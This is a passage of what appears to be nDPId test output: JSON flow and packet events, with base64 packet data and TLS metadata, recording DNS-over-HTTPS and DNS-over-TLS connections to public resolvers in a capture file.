1qzwLgfjx1ZGRqf62CTxE1WBGLSGVSBUD0U9VUbvm7X5SNczaQPf0VLn8L3p7i1Ks07MNKvx2UZUXfrd\/RU2JWlAdhuGfs4RK7IYupZ9gwETRs4hxHaE\/JmiH23lQ8LvM6OtMsbQ6PirB\/Qq+igXuyD0TY3sAc4gdxm+SJGHsDpdSKgD9SodG\/vExsIGp+Gl5tevJKVwUT0pGU9EjX1Bi1e0B1xZ5ye5cjD8jxqC6fGWDYbc0qUQnT6Ei3AwoDVwqGAF6EPjjKHUKSNJDHKDRweWDMJ8eQeivUqlu+lhWhCAE9lUvj8qFKlloewows6Y7yqVUmSPPw60JQ\/7KRplxJ3xUWU3++WylOr+8YCwNo64NgMLldroBbTf3wwNL5K2B8K2fa0ar2Xxz3JO0bcvkksssiMRLPicETirp6CaB0jh\/JBv+EtfNF9XlRRV3bVxTCpp5g2WrRk6UQuYXfLZgXXpvWsW3UQwQvcMLuqGRqk0Lrq45fax67cEa4ablkdoldX6BJdVjUPEVJmY\/4EAB6c5ffE2gmcKP798gpjRuEOsJHx7lU8XAha86w59XzXonwVhFiFEiku0\/ryBztip397enoLu3d\/DdWuO13MC2xztCFDC63o+OIx4LKccR2dUluAwyjMQHJH2QfKyLnH3gJwChS1jbNN6JjmBlIjJ5F5oE0c\/LLe7ZNRcNl04\/gPLP3X4Ig1u++FkuVZR4VffxYIDiKTeCsRjSq8xT0sFQrVMRqRExsxUpTFlLjgmk+4A5gz+AWsHQgXQDHpc8q+tpaaLw2T\/VxrMhaAlTNwD0R+fPu6xqKcmZ7K4tPJ18rUG2cCEq2Vyx\/nZ5Bsb4X51YWHYwI\/b62OL85Ky892\/YpuTiyCwr\/n7zKZjbYHc3bE3kJITVYYhhm7SCsQwZLdboBPXK1hc5zPXoZ51+dKsAS5jlTrL7t90UaX+3d5RBjR5yWI+hwkpRHZC4YPu4wFBj9CS+kKkAjOdshMO3DBnfsoKT51IiDooH56PULR9jXPjPvXwHziEAOD5lKZLhl\/1PpgUaU+m0Qhb9DGdPkvd5L5MtmeN6AG3ojp00pWioyce1OEa+lwCX86DDB4V50XA8WSmUf8Ruv9dDKOkEto48W94o6jbWCBaVHLa30AI1sBDsLlVma26j5oIbiMjlGK8ArsP5ukW3ec2Ucyyw4OeOhYe4PTq7O8QJdyRJffrasJ10uS+VJlhZE6nntiGTZcHenBLx6mVY\/sNy\/xKxBzOkMpSKdjL8GC01HDHp6JDU\/ZHpm00Le70fm6tFZ9vCb5wPUsyYycjMTWmiSgMdLOaewpU9tlODZTwi8DEVWJyEa6fkCFWYdu3u0ydeu8NzIOlQcZ1lyy\/E5qNM0pqUIMKgu+I5sA\/1d+JmmvGoRZQYTQTUa3kxoSS7rPzyV28dHyfYsyZ6xH4xX0Te4M4ymNWY+c\/L9THfsDN\/oVSD593mlv7UAAlNYa3xzFv8UKd\/o0wqF1apADEX5sol\/96BK9yt++kADu5RkL3Q9suLz5lPpANm2QRRIs8Ow+4yzU\/7qCzwe3wQndBdO2mvPNrxNQWX0RWtNADT1hADdzQX8UO24dOXh4qk+iHH6bl8lfIvW8+qqcF2nRbvY6bMLSrGQokwAzcMtwiZdjIJEsFZPEIqPD7EZnzjfnQijrIF9Wn4vbTwPzBnADd1msbtKeSaVNdMJih6KLod12TaeDOeCDRiB61IfXV9dgIKfGFyMlxjk0+d6Grs+cJ7UQzYlQ0mX0vg3on5LNDK23JzvxJlO9RApmtXu0TOUl67cxwpSzAdhxbWvI8l0V4Ai4I3tdYPelpVFVsSo+cgXM3bWISOOqQjzDzqnRV3rpFOpKmYj18yo6Iw3eQgPQrdVloO5tfEf2RUtUbOK+ineibqkTHcOjvhuseYK31qZJs+iTw0+voLfLVtqWLppBhUR5ajc3xYiWsGOK3UP0Zb+9tGTDp7eUX5mpFIs5TGNFA+qxq204tT5KujsIYtCIDdSXn6JYPAXRTlwA4oEjKa3OoGb33tMMT9hVxCQHDLFOs45v41USfRH5jGOfkuc9t77jPR84y7jSr8tXiXsE5CuwKv3P7uF9BVlABkx3ZlxEIz4\/1UR7mzFGAx9K\/RIDlF6SxU6mh73+mMXE0JVkoSTGdIPiDILMtKbfWz72\/UvSW7dTt35fwXmnQwL7He\/RlLL0\/sjJ8vBxcVsv7+Y0XxXaeqzhRtNiCnRgUcTqfLUOJS8aBbh4HPdSKkdltzZb\/S5Lper3Z8zxxuZkIif3ZJ\/gz\/T0iQbX6Et9RMROBoUHjPg5pKYqkENDxoMG\/MC0WVGiX5R06OFe3s9dZ\/ozvLZvYcEZE7N7F5n9sPRwd+I+59lPh72uicIxFdChXuEOxCFU0V3rGzpol1Y\/VsMpTxsDCKvlfGj6qXugNMGkxmq51kciXtj75pUlzwIMe6kQUn2jTFnukdp6OPxrp0T4\/lDiC3VaK0fB4xi6LdOz\/EwCzEu7lICtRLOOwfKoiPsMnC\/K4Myo47r7qgooc6Dyct7xyGHbGYJon8e+PQMECksrlAXwIcA8LQoEysxirtgk51VSp5RdhUCampTO83NLVIjW6\/5AUld9ViiwVRqzLBg7wtcqkBPZd3uqzxG5sC5MeKaDzMg3QKygjiklub6zdiCWJK8V5PVpgiHBa0as\/kw\/NbzRIp8\/DH7U1o9eDK98CHzu8jiLgQ5n1w2IYkMJA1JpBIvlpsoUz6Qe08g4O6AzxZi5RyC6\/8K7\/Ed0NrDjr+G1S6iNZ+qijE4QRaBke9Co9IWob47jnSAaxgFwziKOB2hnQn493UlWhwDwQZuENq4DusUKLl4gaZTo1LvBrcu9EW+pZ0sdlBNW+e5bo09BfXSYhwTQVczSoVWspRueOrFVGx29DRpvDMWXSToev+\/5dhguN8sE7\/6r6UStt1tBEq6JkIdV7o\/cGVmADZ9PpG+uKpSV95fJQxwhEgMidjt9Nuj7TkbtLKuomHY1OGt2HlKFszmF624Ixr0UPZ7oS0P3i\/BbBVqEJdJZsiVw4MhJvqQMjH63aJ9Ie4EL24xwrBjLm1YPTGhWjPxzGPCBhmgSj9u3DHYv7ANgf\/CwtQN4PY6wBmanZg8AFnKkxZzdFSDH5pdfVl85gHQh72n"}
00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739317842,"flow_last_seen":946739317868,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3187,"flow_avg_l4_payload_len":1593,"midstream":1,"thread_ts_msec":946739317868,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":946739317869,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":814,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":814,"pkt_l4_len":780,"thread_ts_msec":946739317869,"pkt":"ZmZmZmZmRERERERECABFAAMgyWNAADgGlH3DHl4cCgAAAQG76noxQgeaybKGNFAYAfV6GQAACB\/j9FRzrXDeV1gMTvdtnDbaxVBoJBh9cy8pOcYrD8iqnoIgGbCFSCgUCuevEmCLqMD6ndxwNBjeWxvehtGcTzYfxO5MsUhftQ0+dqR1WhFRhDtmvuIG3Q\/1JnJ+iTTGKy7+d19ANVD5kJS2Kbw1kq1CCeKCETSjOhUhw85xD38cYnUuHGOyMgN3a57KOUyOmb4EwXoByM8BsVlxu1vc1oPozugCeie0GDWpbdeaEmjgROEgR6DsCHE32e8OUOXMw3\/fTV5lRZlHvoE+WIdAJO23JksMoSbzH5lXNpwBfPg5fllHB2gzZy73MltgSTbtU05NdkOcr1ZFoqdQ2V7wBDgCUult1m1frKnm9RbG5so0kMdI1K2imdVR2omx+E2ZIA0aLFwNHZ87uVzv\/27AUYdBTlcNoD9yJPyo52+VSIEhFJ+iC6HMt6T8vMgHE9t8doC6zzQ5PPfhV0Y\/wHOciEZ1QCJawdjeaWA1oK+LH3dEkeN+2N6ZvT6aGJRirsBAqqpY1jcHkYSWOu0YNfkmmhcDAwEZhRt19HF8btCDpTYJhT082yjULJw4KauCEpxSogJCDv0wIm\/nxsgKWJ5swMbqyuXpT7mdSSff3VOjrgPc6f4pSWMC0gPkidij6lKAHSShm5G9hfxPyAE5LFfSUSjOyv6KeU3qvvH\/y9kOCN3ZJI34MmNCSHjx7F7SwgBhT+XBQWcGdTlLW08ufWjBpFEV0wweQ+sorOCpyYk1BQhN7aPpwW+8cPmzhDQyCikmnIgsWh1OdzHEfXqnhQmoNEJoF7iPcZZ2Q5XdXc7TB5Nr97MOlFTANPGwh+Z0IQ0oeyTOBC76R3rCyPcgQuUbw2ZmngRvKZCro22Tf+lTL3RL8Wypoy8hNNZMukYZOxZV3pu1hHfTdtt5At2T9yMXAwMARRSoalzVajpzS8ANj2fKvjjGfm\/L7CaKj2s8TbmN14sqePDJ6R8MH8TM+nnzmnQKkuZgpCVkmHfyoZtoN5aVAw1RpWQU5w=="}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":946739336955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739336955,"pkt":"REREREREZmZmZmZmCABFAAFEM0dAAL0Go94KAAABuelq6LZCAbsgVVLXybMJllAYAfbmxAAAFgMBARcBAAETAwMcr1WdeadOHog3lEpiodEeAcm2gZJgU0L8O6YStA7tWSAYYApreqfeMV002xSAt2FZT+xN2PBaLBfkQPkpY2yRnAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOZG5zLmRuc2hvbWUuZGUABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgsGpq4zmMsA+1iGgtz9f+LYYNyHCIQZ\/zq3SyFDX6FwI="}
00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04395{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":946739336992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739336992,"pkt":"ZmZmZmZmRERERERECABFAAuAvuxAADkGkf256WroCgAAAQG7tkLJswmWIFVT81AYAfXxAAAAFgMDAHoCAAB2AwOH51VjdKQ\/AZQoSOmoC7jYQ9n9NqAbTWqEvktHdZeP0yAYYApreqfeMV002xSAt2FZT+xN2PBaLBfkQPkpY2yRnBMCAAAuACsAAgMEADMAJAAdACBHlT\/ckNv1zu+YfSt\/zxC2rtSjIy\/UHNmUMGM8UGyVRxQDAwABARcDAwAgwilHvuszxY2P55AdC9vc0WNmaI98gk9UASFHh+rOkuIXAwMLGSaHw6LineCaEcA9j88fiSZ7p3jmYBOCmFwXmWuJbNVbDX18tcQr3ZATZwug3WdQUgZQuGPbLNtio7ePY9WJu1m+mcBvlmSf8p+kNIdmks3LygnPjDC2c6UxorLMoKdZpIF74n0UwdI1haIk7t9SxqKBNHhLqhVzXfA\/gYf10GXPi1hxhIDRS0KcW02uf1aHSSQNM4lfDYD4RpVTTVdscI7J3G592b5BxWNyVv0Whq0mJ6igzcGRSA9ve9GnhfQ7PQUMhLbnBs6Wh4\/E06aah5j\/y2NN9Rc5DR0mq07rU5Ce+\/XxD4lUU+ekKKMEv73SbncelyWJ8Y5vAOXrDEqq81ak\/UBhx9qx8\/JbLt7htRmRK4POVPXjov3f3Cr0\/J9vWUZrGJZBIzd1UHWlYZqWZ2e4zJnIzt4CgmUiyp0aneIGvtzNkXr50R32ENIRIAFyE695Wqs8jERpSPGsHn3huPrLifotNcrG9GhWfn+P06Pt7D4zUiFfvh+LyEBgC4g9mLo7FFTR9ZBh4cvU6KR2JbkcthJ2\/eit4GXyWKglPq9JYKNPyFUXXYoA+haf0kKxXZykljYvB6S+pRhq5fgW9P0TnapNy0IoETL\/FsgOgMCO0tJLa6wJ+moPbCUrnqhRlYqM1pTafI1RDq9YRk8QTG21gC3tmzmBSfh\/ZYdFQXZmYXvWfFwGRjyPIT9+zMlqq2Pdp2JskHpsbB\/FwB1MOL4EMGO2rEvqAN\/G+LUDaZwDQErYmrvokCqs5wzQjVzO+vQiri8OiX7KtSVymFdc3QbFXkOIAgL4ZCdwmcaz\/rCx33yioKUWWt5qTqCZ9pmtXhl4HcAp8XhgUIEYBgprpf\/Ti2fp0ElRAFLFXlwNoLI9iggooHHGhx21Tg5YhcbP60KH\/320Ma9w9iPFEDojm9a7Uksk9S+uRWv4OhUAAYKjuWZotkEozfx2xPJWhN+3nf+Iha6M\/PTSY3MMhm1WzIZxhGYM104LxfJgMU8G9gWojlgvjhJ9uq3S6TQd83u3bJfgu1uC+MqFUVxe5NSUl7ikQ0I2+aFOcROfwG1sC6mO3ReC1pSOUUz4gO3A9SSBBDyhLMPE7cirAIcpsT33LqFeeSDEu0N967vwR6xVh0M7jpo7PUXyGgThPlyiOpRF9s8WGXtAs8kIwGDjwgfzhZb+5Ica\/Es\/V\/Dcco2lqRgq\/dcAdyZM5sv0arfbaybN8N7gqsGjPTm+jzsbUO6EEvEXHs0ldZG8m8mE2GFXoShd8wgIhqj+fRxwQgiYi3jFhqxSX8HSBaQWBy4gUMLE10OhfyAXvg9pZiOtBVXbyXYhifDjhNa8C4V7nKfsRjcc+IPNLOUCpNnF7zVC\/0wEFNmAysEgZKbiQ7nvWTQEj\/4XkHTl7q+V1nyze+YBcVwnousw\/sC5PPMkFjNe\/rVKH6Nl21Xz4CEnFJQWyg9SJCs8VgXn5Gx1la2fl1eBBcFXXyYGSGvhO\/t81KOmn26l6yIAJ+49g5RwCWqzmcqOfJ3ZxKGRw+Q485Of16n26ALDBRuhLDlJPjC0rbaer7p0vcHW895cpbl01o6MkW2RA6neV7IiozPr9ltdIu27V3GvvBr7fVargxd2L+tYgyfTl9\/WILWXDEQZ1hdvd3QHM4PdFHFrVVzTGEggsJMhAt5dWLBf1xkH6HOVjXSYC7QWsq9x8ZMQQFScuqTVdGfJ7phQpuljGNTYHS3Fr6g3GHbNodTeleAa40XcWPRR1QvCNrU4+1mAEfui\/VF5yCnzl57O6v4AZaL+xkQS3bq5TgH0cEyHZIZPSXLjPO+kUoZirl9ExMfDKt7TaVQdS2YK2Ak\/Zeh3+0YL9HobNvrh9Kdgz2l9vzkzpGJFhtkFPLbfyoUqy9qVF5BYXMDsDNfzLRqQCkxTChoU3Oq5WC+NNoDfVEiV1uqKr4CPZT+MhJo3dMWH5rs\/NiqvW5Ts1TD9YHqyVEww4VuTJUEbvVoPl69h72o9XVtS7KLsKkPydjzTTKhHgn+fyRDhXnwLBWppDpzlYOaK5Bu7LUZ7jwPpDGb2uHb\/NdM6kLWzWHLfaWGXR9MiHxj02STxuaoJkhvcxJyZ4jf7EzDEtGtwrRtO9550RF2CTHt4JP2DLjHk039ZthYCTpxRqRekm7pNrIMm6JYaNTmH7DS2CnClfcodyWQo4n2PKz2RufAiyCR1Iovd48L90Pg2ksKOnBbJR09P4LdtuhxQLd8MMrL6a2NJAZcO+1X34ekx37pjBc0ECEHI\/F2EsMCaSmXvfpKvJDUd4hm6Lh+s4zDGKyYb0h4IN9C5WV\/0KBLeUKLuzHg0tLbCpWl5JAtrGio\/3uzgZW3lPesajgf6\/6yAiqz5a5LojXhnEilNNECArJbZRC7dxSLQfHafj61RDK6iVUhWyQIyby8NmvYxyArKL23gG\/dtpUv9vzD5buro8NzKqBt4kyQq5AyRDl9Pdx90dbqzL\/wNfIMw2mirNqhLtAV3Lcmt\/A5VrjLx4ZixfonmUVwV7Oggr8cd2H76iCaLM2zov\/KSvGOLzKOj0+VfjyUlo5Hx0LkrFyR4dGU8OrY4\/30wah66XxEoGD44ZGGY9mmIzDkQJmAUZmkkS7CDbDg1Z8FYCE7np6+eulLdG560xvNnTNnZupEtGdS5efhEH8mvJ96YqbwwP7SeMnjliahQXu1+lakhVlu8+nICagunD7qLvS+Fg8H3c6rjbWQ5ju6044gUUjdx9m9ucGTb1DOdOSzatH4eu\/xj8ZAYSsVq\/DNz\/DBK6wsphchGHTe6SX3Win5Q9xfrgZYWPZHl0ArgB0ilWMiV\/ALLyorbVNLl9DHnMkx10GmbnCSrwAOigo8SWLMZlWe1j\/W9cK63Ok4pAEypI+tsaU4+KGNcg\/Y809pje8RhsRhZyPyRSO4W7\/HH8AmTmAipBXMFJFIlbGBgYuDxl\/k3WXdS2IEVB5uVrdrK3IuYdnPCCcVuL3hLwj6k9lhcwgEM27zriQrtCvCjvLyB8dJvyzZCywv3b9Z9hbJbpIZQI3lMz+XJWCtXR9B5wT2TiwcFkZLA8v\/Gj2OeLuTROa+JmAs1Cy1LT3LNHOmrtPT6ceYpz72COQRQio7ykebG+XDgiLiCvhnLtQVxEQCyclUf0DdNX7KRiUsNtpm9qhk\/7G3HsLQ++6h8v1DP0f5LGqLcix7u2oI33Cf4OwaMqtYGg3yPzbp5wNZ8XB9tSXKBPcsjkv4tUNMLMknHSDtW7RBZerB5euuv2oYXeLw6W1kFDZQwREcwkkkFkPaFTf2R0OaQ0s20yEJ+2MP7zAUxwADciRnXdaSacxi\/MFaNm0cuKFuTZ4y\/Y5UDPv5UQlN6az+4ZYU2R4xFvAktPXCaDzYwhyETBBXTQ3kCDrI2ulxdBfYOIiMYjZjYc8xv3tq1mBsJ+7sgbDu2gL\/fzU\/XzK9B7Kcn43ttHaGeIj+jaXeNq015DYfGa1PFCW5NxEG6gmnM2Xks2\/Rnpc+U3EocTaXUc80yTiNXgxgwYfe8v7xwjDD8vmvRwIAbeusZYjtv2\/kzAUu4e+OEPcd3Jl7OxogoNIIdrVgd4b6ak43cbXB0SXrSOX\/1U+4+a3+9h3qxiMRT+7taHA6EbLauuw0gFFTQLeevuvsRegZK"}
00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739336955,"flow_last_seen":946739336992,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3188,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739336992,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":946739336992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":782,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":782,"pkt_l4_len":748,"thread_ts_msec":946739336992,"pkt":"ZmZmZmZmRERERERECABFAAMAvu5AADkGmnu56WroCgAAAQG7tkLJsxTuIFVT81AYAfUY7QAABNww0uNuIsxm8qmdOPnMYeMk326YaxrhZ4BeE0iQsCOXpRsiKt+zuMH\/p46kXln3RjaOovnK3lxdaHFHnp3StO0w+9qyP8dfRt45iKXPZFHyuSZwyZICfazc2HX7baqawWsKHZ5R1vywVP6AqZpQ8xcDAwIZV+38qSfJjoOS9nhUEl3M5HQzO5DKRWLOqxVrOGS63iBZfxHLzBoty2qy3aDDfnx2Xca0b33wH+vr40qRx9mkz2WtuJs2PYtZyC6YxK5JHe0kUVYNQ8e0DmF1+83AmxFepTqPZR2RfXf2xtUUMst9Opu0LUgXejoef7ambf+g9Hfx1wcIPED7otCGjweGJmU4YxhSCmvm\/0prJdQTwLXZC1W3mnq5JD37u0ZpUZMdfulvx59AlBuxI9dDcGROTozpsYCeE9oOe\/+Op0XuIETBK4vQLjS+LqRPSPWlSzl34Ie9Lj5RtzFBiCOGkmC7wa1QGFdc0GBzHqe9X2VH4rhHT\/IVDbq7gKOuuDcZFEQo8KQkkgT\/bghJzCpIQIarVLOPJxv7EiP8jhgdtK0VY7ia6u+987fqrobyPuMatQbDO9AYRrsJJ\/ihFxuvGwFO0eh7s9vftBi8t0DzNQTsnPfAcZ\/ZhEkLxw\/vJIZfSRisiciHHsUp4piy+90mTdN5MUCDY5ry7DKAw6vfyOQHg9r82wvKNjwJ+rcekPLEv\/FHRvy1AZ1HMnW6KZrjJNV8SoDwDvDT5+zsDiOQRZ1eS4AXXC0O32K6gqAACjcqP2miu29e\/oaEK6\/b1NO2Ve4\/XFw2LcUxmiYpmfORgcrg0e71Ts168PRZOrwhuw4jECElrQOXPiGerekKt0pjC\/PXBVUwNa02PEriryGUFwMDAEURcT9DfIBolrnsJBL883VWax5ssbCevOTqwONlZ29TVRgiw1ubDPfUhqNcVCvs6bW1xyVTdeWqdjyxvrhijbOm0mBmopM="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":946739348407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739348407,"pkt":"REREREREZmZmZmZmCABFAAFGD1pAAL0GczUKAAABlTjkLYysAcV+b2P18dMOKVAYAfY7WwAAFgMBARkBAAEVAwN1j0zYbg0sj5M3182ApIbVPce07i2k0VciV63ZowCdCSAqVc02WrOXRNItgTWsiYtxSSngWuVjvyRNgTc9xl83+QAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG5zMi5kbnNjcnlwdC5jYQAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDGkG2e0e5ygLjqcZTIOnp7CQIXlvblqyaK24BObKyFNQ=="}
01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":946739348519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3152,"pkt_l4_len":3118,"thread_ts_msec":946739348519,"pkt":"ZmZmZmZmRERERERECABFAAxC6ChAADQGGGuVOOQtCgAAAQHFjKzx0w4pfm9lE1AYAfVGVwAAFgMDAHoCAAB2AwMRVjU7SKUNCImmvfttR+GlB5jHaN+TnBAPl2NNilPzIiAqVc02WrOXRNItgTWsiYtxSSngWuVjvyRNgTc9xl83+RMBAAAuACsAAgMEADMAJAAdACCw4eX0v0AF\/2ysIrFslRpf1BB8aJflBi+uBQjF\/mpUaxQDAwABARcDAwAgSKLdPzNvW2jgnkkt1ArGKeMX1pOVS05PtE3+\/eUokuAXAwMKE7xrj8Cd0gecm+XxCtcCbfqp0Xw17l8bEv\/shADxxxp2Bzbyoz5R49XobAcn0zX4NMbYWhifQlUUPNi0pizuvO4Z2uJ7BgjBOgi7uGW9+EclkcQWPWUejxuRe7O410Q5Df3K0lFnTAKG5Q8hFQzWRLGpFNFdEHr9f\/gxxabZC79EC8Yp0yPXv\/HmMDXkQ4MFiklGk+tPcmld0DJxvUQMzeQxCm86Y50216avc9vAu6fj0J+kYdXk7oWDmD2dtLnR5EwpZu8cRY2UbUkl8ALnrb07VMOoFJY7zPFJIjuPu6NJRBVNZJB3vE0d6+a5PM4g6gDBfk3e5g98tlFHWiMNmuoZFlZFFaCJemgWUBnumrnynKFU46wjegkqBdCTk4d+NWELHpY6VAZduP79nQdaN3tx1a2c01muRMXnx81+ULomH3\/REIZL8cJwn+2P90vZcz0nqHAdHNiNOVCuiRaWyF4Wvtc2sEcGUjXGdVCvWK5\/TAJXm0J2jHwKksw9UwwmgBH2L6bGrwRyHCJ2cw2hrKj3bjjl++Bt52RqDx0PVra\/rDo\/D9uT1POR1MaM\/x6LwSGCpAydntCKtia54FgA3Uhl\/nC30fr8SinEx99ZlxNZcUwMiSNiiKzXEm9FsWYC\/mMQzJV1i0LpOAR5NQqTWYZcgE0\/OveI8ff5IAowgJ+Hh\/4cxgYyfxncxnZuou7BNW6vK67qt4eHbNzMxkGd+MYfZPjpdNHgl0+9xwS+qPx5Geun7Q7WO597TYhUFRG65T4qW2mYIUwL1aivadFz0v3ufWodzPjitCdjrW\/CjxtgUeu